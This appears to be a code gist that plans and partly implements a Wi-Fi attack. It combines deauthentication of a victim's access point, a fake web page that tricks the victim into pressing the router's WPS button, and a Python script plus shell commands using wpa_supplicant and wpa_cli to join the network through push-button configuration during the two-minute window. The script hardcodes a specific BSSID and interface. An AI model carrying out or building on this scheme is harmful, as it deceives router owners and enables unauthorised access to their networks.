Splinter0/scheme.md

## scheme.md

      
    Raw
  

              scheme.md
            
          
    Scheme for wps button attack

Using 2 wireless cards

-1 Setup everything as usual
-2 The victim sees the template that has a "continue" button
    that button has a post request that starts all the process.
    we use this because we can't start the process in other ways
    with only 2 wireless cards
-3 In a thread we have a listener waiting for that post request that
    starts everything

The process
-4 The message to push the button appears to the victim screen while
    we stop the deauth setting up the wpa_cli on the same wireless card
-5 We wait 2 mins ( the wps_bpc is activated for 2 mins from when the
    button is pressed on all routers) trying to connect to the AP while we
    keep scanning to see if the AP channel is still the same. 
-6 If we are not connected the interface goes back to deauthenticate the
    target, otherwise we are done

Problems
What if the victim resets the router instead of pressing the wps button?
- It doesn't really matter because after those two minutes the interface
    goes back to deauth, but before that it does a scan searching for our
    target (using BSSID) updating the deauth with the new channel
    (after the victim restarts the router the channel changes)
    to make sure that the deauth restarts properly.
-Then it restarts everything again, wait the user to press continue, stop the deauth,
    check if it's connected for 2mins, and so on.

Why do we need the "continue" button?
- Since we only have 2 wireless interfaces we need to know when to switch to deauth
    and when to start listening for wps connection.
    ( everything will be more clear when the html will be done )


## wps_pbc.py
import os, subprocess

"""
    Automatic WPS connection with push button
    Passing argument : bssid and iface
"""
class WPS(object):
    def __init__(self, bssid, iface):
        self.bssid = bssid
        self.iface = iface
        self.conf_dir = "/etc/wpa_supplicant.conf"

    def setup(self):

        """Setup"""

        sup = "sudo echo -e \"ctrl_interface=/var/run/wpa_supplicant\\"\
                "nctrl_interface_group=0\\nupdate_config=1\" > "+self.conf_dir #wpa_supplicant confs

        wpa_set = "sudo wpa_supplicant -B -Dwext -i"+self.iface+" -c"+self.conf_dir #Start wpa_supplicant
        iface_up = "sudo ifconfig "+self.iface+" up" #sometimes the iface goes down after wpa_supplicant
        wpa_cli = "sudo wpa_cli -i "+self.iface+" wps_pbc "+self.bssid+" -B" #start listening for wps_pbc

        """Launching the commands"""

        subprocess.call([sup], shell=True)
        subprocess.call([wpa_set], shell=True)
        subprocess.call([iface_up], shell=True)

        cli = subprocess.Popen(wpa_cli, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)

    def dest(self):

        """Disconnecting from the AP"""

        rm = "sudo rm "+self.conf_dir
        iface_dw = "sudo ifconfig "+self.iface+" down"
        iface_up = "sudo ifconfig "+self.iface+" up"
        wpa = "killall wpa_supplicant"

        subprocess.call([rm], shell=True)
        subprocess.call([iface_dw], shell=True)
        subprocess.call([iface_up], shell=True)
        subprocess.call([wpa], shell=True)

wp = WPS("28:c6:8e:7d:51:d3", "wlan1")
wp.dest()

## wps_push_button.md

      
    Raw
  

              wps_push_button.md
            
          
    How the push button actually works :

Push-button configuration (PBC): in some Wi-Fi Protected Setup networks, the user may connect multiple devices to the network and enable data encryption by pushing a button. The access point/wireless router will have a physical button, and other devices may have a physical or software-based button. Users should be aware that during the two-minute setup period which follows the push of the button, unintended devices could join the network if they are in range.
source
Single commands :

sudo echo -e "ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1" > /etc/wpa_supplicant.conf
sudo wpa_supplicant -B -Dwext -iwlan1 -c/etc/wpa_supplicant.conf
sudo ifconfig wlan1 up   #not necessary (sometimes the iface goes down when activating wpa_supplicant)
sudo wpa_cli -i wlan1 wps_pbc 28:c6:8e:7d:51:d3 -B    #your AP's bssid

Automated version :

Here it's the script that automate the connection through wps_pbc :
script
	import os, subprocess

	"""
	Automatic WPS connection with push button
	Passing argument : bssid and iface
	"""
	class WPS(object):
	def __init__(self, bssid, iface):
	self.bssid = bssid
	self.iface = iface
	self.conf_dir = "/etc/wpa_supplicant.conf"

	def setup(self):

	"""Setup"""

	sup = "sudo echo -e \"ctrl_interface=/var/run/wpa_supplicant\\"\
	"nctrl_interface_group=0\\nupdate_config=1\" > "+self.conf_dir #wpa_supplicant confs

	wpa_set = "sudo wpa_supplicant -B -Dwext -i"+self.iface+" -c"+self.conf_dir #Start wpa_supplicant
	iface_up = "sudo ifconfig "+self.iface+" up" #sometimes the iface goes down after wpa_supplicant
	wpa_cli = "sudo wpa_cli -i "+self.iface+" wps_pbc "+self.bssid+" -B" #start listening for wps_pbc

	"""Launching the commands"""

	subprocess.call([sup], shell=True)
	subprocess.call([wpa_set], shell=True)
	subprocess.call([iface_up], shell=True)

	cli = subprocess.Popen(wpa_cli, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)

	def dest(self):

	"""Disconnecting from the AP"""

	rm = "sudo rm "+self.conf_dir
	iface_dw = "sudo ifconfig "+self.iface+" down"
	iface_up = "sudo ifconfig "+self.iface+" up"
	wpa = "killall wpa_supplicant"

	subprocess.call([rm], shell=True)
	subprocess.call([iface_dw], shell=True)
	subprocess.call([iface_up], shell=True)
	subprocess.call([wpa], shell=True)

	wp = WPS("28:c6:8e:7d:51:d3", "wlan1")
	wp.dest()